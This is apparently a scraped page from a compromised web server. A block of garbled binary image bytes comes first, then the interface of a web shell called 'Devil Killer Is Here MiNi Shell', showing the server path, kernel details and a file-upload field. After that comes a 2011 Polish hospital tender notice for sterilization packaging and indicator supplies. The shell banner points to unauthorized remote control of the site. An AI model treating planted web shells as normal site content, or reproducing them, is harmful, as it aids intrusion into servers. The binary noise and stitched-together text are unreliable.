JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111109/292577-N-2011.html

<p class="kh_header"><b>Kamienna Góra: na dostawę  materiałów  do  kontroli  sterylizacji</b><br>
<b>Numer ogłoszenia: 292577 - 2011; data zamieszczenia: 09.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzp.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowtnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na dostawę  materiałów  do  kontroli  sterylizacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o. o. Niepubliczny Zakład Opieki Zdrowotnej Szpital 

Powiatowy zaprasza do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 19/2011  na 

wybór dostawcy    materiałów  do  sterylizacji   dla  PCZ w Kamiennej Górze Sp. z o. o . NZOZ Szpitala Powiatowego.
 
 Zamawiający   dopuszcza składanie ofert  częściowych, gdyż przedmiot zamówienia jest podzielny i składa się  z  10 pakietów:
1) PAKIET NR 1  Ochraniacze do narzędzi zabezpieczające opakowania przed przedziurawieniem
2) PAKIET NR 2 Rękawy papierowo-foliowe z fałdą
3) PAKIET NR 3 testy, taśmy, wskaźniki
4) PAKIET NR  4 etykiety dwukrotnie  przylepne 
5) PAKIET NR 5  włóknina do pakowania zestawów 
6) PAKIET NR 6  torebki płaskie papierowo-foliowe  
7) PAKIET NR  7  torebki płaskie z samoprzylepnym zamknięciem  
8) PAKIET NR 8  papier krepowany 
9) PAKIET NR 9   rękawy papierowo-foliowe bez fałdy 
10) PAKIET NR 10 opakowania włóknionowo- foliowe 
Zamawiane towary  winny spełniać wszystkie wymagania stawiane w SIWZ, które powinny być dopuszczone do obrotu /zarejestrowane zgodnie z obowiązującymi  przepisami oraz:
1) zamawiane towary  winny spełniać wszystkie wymagania stawiane w siwz i które powinny być dopuszczone do obrotu /zarejestrowane zgodnie z obowiązującymi  przepisami,
2) WYKONAWCA  zobowiązuje się do dotrzymania jakości dostarczonych towarów,
3) towary będące przedmiotem niniejszej umowy  będą dostarczane Zamawiającemu w opakowaniach zabezpieczających ich jakość i 
        odpowiadających warunkom transportu, odbioru i przechowywania,
4)    zamawiany towar  powinien posiadać  termin ważności pozwalający na jego  magazynowanie i  prawidłowy odczyt. (Termin ważności  towaru winien  gwarantować jego przydatność  do użycia w   okresie  co najmniej  12 miesięcy od daty  zakupu  z wyjątkiem towaru o  terminie ważności krótszym),
5)  towary winny spełniać również wymogi określone w  rozporządzeniu z dnia 3 listopada 2004r.  w  sprawie wymagań zasadniczych dla  wyrobów medycznych do różnego przeznaczenia (Dz. U. Nr 251, poz. 2514),
6)   w przypadku produktów niesterylnych na opakowaniach nie ma wymogu podawania daty ważności,
7)   zamawiany towar będzie dopuszczony do obrotu i oznaczony zgodnie z obowiązującymi przepisami prawa, a także będzie prawidłowo oznakowany. Wykonawca przedkłada ZAMAWIAJĄCEMU świadectwo rejestracji lub certyfikat CE jednostki  notyfikowanej lub deklarację zgodności,
8)  przedłożone świadectwo rejestracji lub certyfikat CE jednostki notyfikowanej bądź deklaracja zgodności winny obejmować okres,    na który została zawarta niniejsza umowa. Wykonawca zobowiązany jest do zapewnienia ciągłości  ważności w/w dokumentów w    okresie obowiązywania niniejszej umowy,
9)  Oferowany  towar   winien  odpowiadać  opisowi podanemu w formularzu cenowym zał nr g.

Wymagania techniczne dot. pakietu nr 2:

Rękaw foliowo - papierowy, płaski oraz z fałdą:
zestaw wskaźników umieszczony pomiędzy warstwami folii (wskaźnik para wodna/tlenek etylenu),
bezpyłowe i łatwe oddzielanie folii od papieru, ponadto informacje techniczne umieszczone powinny być  poza obszarem załadunku
papier o gramaturze minimum 60g/m2 zgodny z normą PN EN 868-3,
parametry zgodne z normą PN EN 868-5,
folia o wysokiej wytrzymałości na rozerwanie, umożliwiająca łatwą identyfikację zawartości 
na rękawach musi być podany numer LOT i rozmiar opakowania
wymagane wydane przez producenta (a nie dystrybutora )  oświadczenie w postaci protokołu zgodności z normami 

Zamawiający dopuszcza rękawy papierowo-foliowe z zestawem wskaźników umieszczonym na papierze pod folią w miejscu zgrzewu lub na powierzchni papieru nie mającej bezpośredniego kontaktu z wyrobami sterylizowanymi. 

Uwaga:
Jednostką miary w danym pakiecie  jest rolka o dł. 100m, natomiast zapis ten oznacza biały papier o dużej wytrzymałości na wilgoć (gramatura  60g/m2). Zamawiający dopuszcza niewielkie odchylenia w rozmiarach powyższego asortymentu, jednakże należy zwrócić się na piśmie do Zamawiającego z taką informacją.

Wymagania  dotyczące pakietu nr 4:

Etykiety podane w pakiecie nr 4 winny być dwukrotnie przylepne  i kompatybilne z posiadaną przez Zamawiającego  metkownicą  trzyrzędową  alfanumeryczną (która umożliwia kodowanie informacji takich, jak: inicjały osoby obsługującej sterylizator, numer sterylizatora, numer wsadu, zawartość pakietu, datę sterylizacji i datę ważności  wysterylizowanego  pakietu)  do naklejania etykiet samoprzylepnych  z zapisem  informacji wzdłuż kierunku przesuwu etykiet. 

Wymagania techniczne dot. pakietu nr 8:

Poz. 1 i 2 Papier krepowany:
gramatura papieru powinna wynosić: minimum 58g/m2
parametry papieru: zgodne z normą PN EN 868-2, surowce użyte do produkcji :  100% pulpa celulozowa bez użycia chlorków i siarczków,
powinien posiadać zwiększoną odporność na mechaniczne uszkodzenia( przekłucie, przerwanie ),
powinien być nietoksyczny, niepalny, ulegający biodegradacji,
przeznaczony do sterylizacji parą wodną/tlenkiem etylenu,
wymagana jest charakterystyka  wytrzymałościowa wydaną przez producenta ( a nie dystrybutora) w celu oceny parametrów wytrzymałościowych i zgodności z normą.

UWAGA:
Kolor krepowanego papieru do sterylizacji w arkuszach jest przyjęty przez Zamawiającego umownie z uwagi na rozróżnienia kontroli wykonywanej sterylizacji wg poszczególnych oddziałów szpitalnych. Zamawiający dopuszcza niewielkie odchylenia w rozm. powyższego asortymentu (jednakże należy zwrócić się na piśmie do Zamawiającego z taka informacją). 

Wymagania do pakietu  nr 5 
Poz. 3 i 4
Zamawiający dopuszcza włókninę do pakowania o gramaturze równej 57 g/m2.  
Wymagania techniczne dot. pakietu nr 9 - rękawy papierowo - foliowe bez fałdy 
Zamawiane rękawy papierowo - foliowe bez fałdy dotyczą  sterylizacji tlenkiem etylenu i pary wodnej.  
Przewidywane zużycie wyżej wymienionego asortymentu jest zamieszczone w formularzu cenowym będącym załącznikiem nr g  do niniejszej specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga sie wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia  
       lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wyrażające się tym, że jako wykonawca   brał udział  w co najmniej 2 dostawach (odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia  z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców) wykonanych (zakończonych) lub wykonywanych  wraz z dokumentami (referencjami), z których wynikać musi, że dostawy te zostały wykonane lub są wykonywane należycie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1 Zgodnie z art. 9 ust. 4 ustawy z dnia 30 sierpnia 1991r. o zakładach opieki zdrowotnej Dz. U. z 1991r. Nr 91, poz. 408, z późniejszymi zmianami, na mocy której zakłady opieki zdrowotnej nabywają i stosują wyroby medyczne  - odpowiadające wymaganiom ustawy z dnia 20 kwietnia  2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896)  oraz Rozporządzeniem Ministra Zdrowia z dnia 30 kwietnia 2004r. w sprawie klasyfikacji wyrobów medycznych do różnego przeznaczenia (Dz. U. z dnia 1 maja 2004r.) w celu potwierdzenia bezpieczeństwa i jakości oferowanych wyrobów Zamawiający   wymaga złożenia w ofercie dokumentów potwierdzających powyższy wymóg.   
   
     W tym celu Wykonawca winien pisemnie potwierdzić, czy oferowany przez niego towar  w danym przetargu jest  wyrobem medycznym, a jeśli tak, to należy  załączyć do oferty dokumenty potwierdzające dopuszczenie wyrobu medycznego do  obrotu na terytorium  RP w formie oryginału lub kserokopii  potwierdzonych  za zgodność z oryginałem przez Wykonawcę tj.:
1)  deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta (dotyczy wszystkich klas wyrobów   medycznych);
2)  certyfikat CE j. Notyfikowanej (dotyczy klas wyrobów medycznych: I sterylna, I z funkcją pomiarową, II a, II b, III);
3) wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i II a pod warunkiem, że jego pierwsze wprowadzenie do obrotu nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004 r. o wyrobach medycznych) lub   złożyć   oświadczenie, iż oferowany towar  posiada dopuszczenie do obrotu zgodnie z ustawą z dnia 20.04.2004r. o wyrobach medycznych, oraz zobowiązanie Wykonawcy do przedstawienia tych dokumentów na każde wezwanie Zamawiającego
  
2  W przypadku, gdy oferowany towar zawiera substancję niebezpieczną i podlega przepisom  ustawy z dnia 11.01.01 o substancjach chemicznych (Dz. U. 01.11.84 z późn. zm.) oraz w Rozporządzeniu z dnia 03.07.02 w sprawie karty charakterystyki substancji niebezpiecznej i preparatu niebezpiecznego (Dz. U. 02.140.1171 z późn. zm.) Wykonawca winien dołączyć do oferty w formie oryginału lub kserokopii  potwierdzonych  za zgodność z oryginałem przez Wykonawcę kartę charakterystyki na oferowane towary  w rozumieniu wyżej przytoczonych przepisów.  Z uwagi na zbyteczne zwiększenie rozmiarów oferty Zamawiający dopuszcza złożenie w/w dokumentów  w formie elektronicznej (płyta CD lub dyskietka) wraz z oświadczeniem Wykonawcy, iż treść zawarta na nośniku elektronicznym  odpowiada w każdym szczególe oryginalnej papierowej wersji</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załączniki: 
 
1.1 formularz ofertowy zał nr a

1.2 oświadczenie oferenta nr b

1.3 oświadczenie w sprawie stosowania się do siwz zał nr c

1.4   formularz upoważnienia do podpisania oferty zał nr d**

1.5   formularz cenowy  nr  g*

1.6   projekt  umowy zał nr  e

1.7   podwykonawcy zał nr h

1.8   oświadczenie oferenta o spełnianiu warunków udziału w postępowaniu zał nr f</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z zastrzeżeniem art.144 ust.1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (tekst jednolity z 2010 r. Dz. U. Nr  113, poz. 759)    zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności   w  następujących przypadkach: 
-   wystąpi siła wyższa mająca wpływ na realizację umowy,

-  zaistnieje omyłka pisarska lub rachunkowa,

-   nieistotne zmiany umowy, 

-   zachodzi konieczność zmiany terminu  wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego  
     przewidzieć w chwili podpisania umowy,

-  niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest  
    konieczna w celu prawidłowego wykonania umowy

-  jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację 
    przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT,

-  zachodzi konieczność zmiany w zakresie podwykonawstwa,  o ile nie jest to sprzeczne z postanowieniami SIWZ,

-  możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia,

- nastąpiła zmiana danych Wykonawcy  w tym min. formy organizacyjno - prawnej,

-  zmiana rachunku bankowego i innych danych stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
dział zam. publ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2011 godzina 10:00, miejsce: POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1) Ochraniacze do narzędzi zabezpieczające opakowania przed przedziurawieniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 3 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2) Rękawy papierowo-foliowe z fałdą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa sie z 6 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> testy, taśmy, wskaźniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet sjkłada się z 8 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 4)  etykiety dwukrotnie  przylepne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 4 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> włóknina do pakowania zestawów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet składa się z 3  pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 6)  torebki płaskie papierowo-foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet sklada się z 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 7)  torebki płaskie z samoprzylepnym zamknięciem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet sklada sie z 2 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.26.23.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> papier krepowany.</p>
